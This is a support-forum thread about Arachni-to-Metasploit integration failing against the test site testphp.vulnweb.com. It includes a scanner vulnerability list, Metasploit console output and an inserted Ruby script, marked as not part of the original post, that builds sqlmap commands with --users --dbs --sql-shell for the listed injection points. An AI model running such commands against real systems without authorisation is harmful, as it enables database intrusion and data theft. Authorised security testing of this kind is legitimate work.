WebApp exploitation with Arachni and Metasploit
Hello Tasos,
I have a problem with exploitation using Arachni and Metasploit and need your kind help. Thank you in advance.
I scanned this testing web app, http://testphp.vulnweb.com, using Arachni and generated a Metareport. Then I tried to load the Metareport into Metasploit and exploit the vulnerabilities found and reported by Arachni.
I did a manual exploit using the command "arachni_manual vuln_id", following the instructions in this example: https://github.com/Arachni/arachni/blob/master/EXPLOITATION.md
However, when I run "exploit" it said:
[-] Exploit failed: A payload has not been selected.
Below is detailed information:
Vulnerabilities
ID Host Path Name Method Params Exploit
-- ---- ---- ---- ------ ------ -------
1 176.28.50.165 /listproducts.php SQL Injection GET {"cat"=>"1XXinjectionXX"} unix/webapp/arachni_sqlmap
2 176.28.50.165 /search.php SQL Injection GET {"test"=>"queryXXinjectionXX"} unix/webapp/arachni_sqlmap
3 176.28.50.165 /artists.php SQL Injection GET {"artist"=>"1XXinjectionXX"} unix/webapp/arachni_sqlmap
4 176.28.50.165 /product.php SQL Injection GET {"pic"=>"1XXinjectionXX"} unix/webapp/arachni_sqlmap
5 176.28.50.165 /listproducts.php SQL Injection GET {"artist"=>"1XXinjectionXX"} unix/webapp/arachni_sqlmap
6 176.28.50.165 /secured/newuser.php SQL Injection POST {"uuname"=>"arachni_nameXXinjectionXX", "upass"=>"5543!%arachni_secret", "upass2"=>"5543!%arachni_secret", "urname"=>"arachni_name", "ucc"=>"1", "uemail"=>"[email blocked]", "uphone"=>"1", "signup"=>"signup", "uaddress"=>"1"} unix/webapp/arachni_sqlmap
7 176.28.50.165 /search.php Blind SQL Injection (timing attack) POST {"searchFor"=>"XXinjectionXX", "goButton"=>"go"} unix/webapp/arachni_sqlmap
8 176.28.50.165 /product.php Code injection (timing attack) GET {"pic"=>"XXinjectionXX"} unix/webapp/arachni_php_eval
9 176.28.50.165 /artists.php Code injection (timing attack) GET {"artist"=>"XXinjectionXX"} unix/webapp/arachni_php_eval
10 176.28.50.165 /listproducts.php Code injection (timing attack) GET {"cat"=>"XXinjectionXX"} unix/webapp/arachni_php_eval
11 176.28.50.165 /listproducts.php Code injection (timing attack) GET {"artist"=>"XXinjectionXX"} unix/webapp/arachni_php_eval
12 176.28.50.165 /index.php Blind SQL Injection (timing attack) HEADER {"Accept-Encoding"=>"XXinjectionXX"} unix/webapp/arachni_sqlmap
13 176.28.50.165 /index.php Blind SQL Injection (timing attack) HEADER {"User-Agent"=>"XXinjectionXX"} unix/webapp/arachni_sqlmap
14 176.28.50.165 /userinfo.php Blind SQL Injection (timing attack) POST {"uname"=>"XXinjectionXX", "pass"=>"5543!%arachni_secret"} unix/webapp/arachni_sqlmap
15 176.28.50.165 /userinfo.php Blind SQL Injection (timing attack) POST {"uname"=>"arachni_name", "pass"=>"XXinjectionXX"} unix/webapp/arachni_sqlmap
16 176.28.50.165 /showimage.php Path Traversal GET {"file"=>"XXinjectionXX"} unix/webapp/arachni_path_traversal
msf > arachni_manual 5
[*] Using unix/webapp/arachni_sqlmap .
[*] Preparing datastore for 'SQL Injection' vulnerability @ 176.28.50.165/listproducts.php ...
SRVHOST => 127.0.0.1
SRVPORT => 14248
RHOST => 176.28.50.165
RPORT => 80
LHOST => 127.0.0.1
LPORT => 10421
SSL => false
GET => artist=1XXinjectionXX
METHOD => GET
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.1.3
PATH => /listproducts.php
[*] Done!
[-] Unknown variable
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore
msf exploit(arachni_sqlmap) > show options
Module options (exploit/unix/webapp/arachni_sqlmap):
Name Current Setting Required Description
COOKIES no
GET id=1 no HTTP GET query
METHOD GET yes HTTP Method
OPTS --users --dbs --sql-shell -v 0 no The sqlmap options to use
PATH /listproducts.php yes The path to test for SQL injection
POST no The data string to be sent through POST
Proxies no Use a proxy chain
RHOST 176.28.50.165 yes The target address
RPORT 80 yes The target port
SQLMAP_PATH /home/nopsec/sqlmap/sqlmap.py yes The sqlmap 0.9 full path
VHOST no HTTP server virtual host
Then I set SQLMAP_PATH to the correct full path of sqlmap and ran "exploit"; it gave the error asking me to select a payload. But there is no compatible payload: running "show payloads" returned nothing. Any idea on how to set the payload?
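To make the integration step concrete, here is an added Ruby example (not code from Arachni or Metasploit, and not part of the original post) that mirrors what arachni_manual does with a vulnerability row: it builds the module datastore shown above (RHOST, PATH, METHOD, GET/POST/HEADERS) from the Arachni method and parameters, and then turns that datastore into the kind of sqlmap invocation the arachni_sqlmap module wraps. Assumptions: the sample rows are constructed copies of entries 5, 14 and 12 of the table above; the HEADER handling and the swap of Arachni's XXinjectionXX marker for sqlmap's "*" custom-injection marker are my own choices, since the page does not show how the real module drives sqlmap; the sqlmap path is a placeholder.

```ruby
require 'cgi'
require 'shellwords'

# Constructed sample rows copied from the Arachni vulnerability table above
# (entries 5, 14 and 12); an Arachni report is not parsed here.
ARACHNI_VULNS = [
  { id: 5,  host: '176.28.50.165', path: '/listproducts.php', name: 'SQL Injection',
    method: 'GET',    params: { 'artist' => '1XXinjectionXX' } },
  { id: 14, host: '176.28.50.165', path: '/userinfo.php',     name: 'Blind SQL Injection (timing attack)',
    method: 'POST',   params: { 'uname' => 'XXinjectionXX', 'pass' => '5543!%arachni_secret' } },
  { id: 12, host: '176.28.50.165', path: '/index.php',        name: 'Blind SQL Injection (timing attack)',
    method: 'HEADER', params: { 'Accept-Encoding' => 'XXinjectionXX' } }
].freeze

# Arachni's placeholder for the injected value; sqlmap uses "*" for the same idea.
ARACHNI_MARKER = 'XXinjectionXX'.freeze
SQLMAP_MARKER  = '*'.freeze

# Build the option set that arachni_manual prints while "preparing the datastore".
# GET/POST parameters are form-encoded; HEADER vulns use the "k=v::k=v" layout
# seen in the HEADERS line above (assumption: the real module may differ here).
def build_datastore(vuln, rport: 80, ssl: false)
  ds = {
    'RHOST'  => vuln[:host],
    'RPORT'  => rport,
    'SSL'    => ssl,
    'PATH'   => vuln[:path],
    'METHOD' => vuln[:method]
  }
  case vuln[:method]
  when 'GET', 'POST'
    ds[vuln[:method]] = vuln[:params].map { |k, v| "#{CGI.escape(k)}=#{CGI.escape(v)}" }.join('&')
  when 'HEADER'
    ds['HEADERS'] = vuln[:params].map { |k, v| "#{k}=#{v}" }.join('::')
  else
    raise ArgumentError, "unsupported injection vector #{vuln[:method]}"
  end
  ds
end

# Turn a datastore into a sqlmap argv. The injection point is carried over by
# replacing the Arachni marker with sqlmap's "*" in the URL, POST body or headers.
# OPTS defaults to the module's own "--users --dbs --sql-shell -v 0".
def sqlmap_command(ds, sqlmap_path: '/opt/sqlmap/sqlmap.py',
                   opts: %w[--users --dbs --sql-shell -v 0])
  scheme = ds['SSL'] ? 'https' : 'http'
  url = "#{scheme}://#{ds['RHOST']}:#{ds['RPORT']}#{ds['PATH']}"
  url += "?#{ds['GET'].gsub(ARACHNI_MARKER, SQLMAP_MARKER)}" if ds['GET'] && !ds['GET'].empty?

  argv = ['python', sqlmap_path, '-u', url]
  argv += ['--data', ds['POST'].gsub(ARACHNI_MARKER, SQLMAP_MARKER)] if ds['POST']
  if ds['HEADERS']
    # "Name=value::Name=value" -> "Name: value\nName: value", one header per line.
    header_lines = ds['HEADERS'].split('::').map do |h|
      h.sub('=', ': ').gsub(ARACHNI_MARKER, SQLMAP_MARKER)
    end
    argv += ['--headers', header_lines.join("\n")]
  end
  argv + opts
end

# Shell-quoted one-liner for display; nothing is executed by this script.
def shell_line(argv)
  Shellwords.join(argv)
end

if __FILE__ == $PROGRAM_NAME
  ARACHNI_VULNS.each do |vuln|
    ds = build_datastore(vuln)
    puts "[*] Preparing datastore for '#{vuln[:name]}' @ #{vuln[:host]}#{vuln[:path]} ..."
    ds.each { |k, v| puts "#{k} => #{v}" }
    puts shell_line(sqlmap_command(ds))
    puts
  end
end
```

Running it prints, for entry 5, the same GET/METHOD/PATH lines the console shows above and a sqlmap URL of the form http://176.28.50.165:80/listproducts.php?artist=1*. Because everything here is plain option handling with no session to stage, it is the shape of an auxiliary module rather than an exploit module, which is why no payload is involved.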
Support Staff 1 Posted by Tasos Laskos on 13 Feb, 2013 02:26 AM
I think there was an MSF update which requires all exploit modules to have a payload.
I'll have to update the sqlmap module to be an auxiliary one.
2 Posted by Yanjin Ding on 13 Feb, 2013 02:53 PM
That's awesome. Please let me know when you're done. Thank you!
Support Staff 3 Posted by Tasos Laskos on 15 Feb, 2013 06:47 PM
Was planning to take care of this sooner but it'll have to wait until sometime during this 3-day weekend because I've been busy working on the web interface.
FYI: I usually try to be on top of support requests and bugfixes, but the Metasploit integration stuff isn't really supported, so it gets a lower priority.
Updating the relevant file to reflect that now.
Support Staff 4 Posted by Tasos Laskos on 23 Feb, 2013 02:47 PM
Sorry I left you waiting, I just pushed the fix to the experimental branch.
Let me know if you come across any issues.
Tasos Laskos closed this discussion on 23 Feb, 2013 02:47 PM.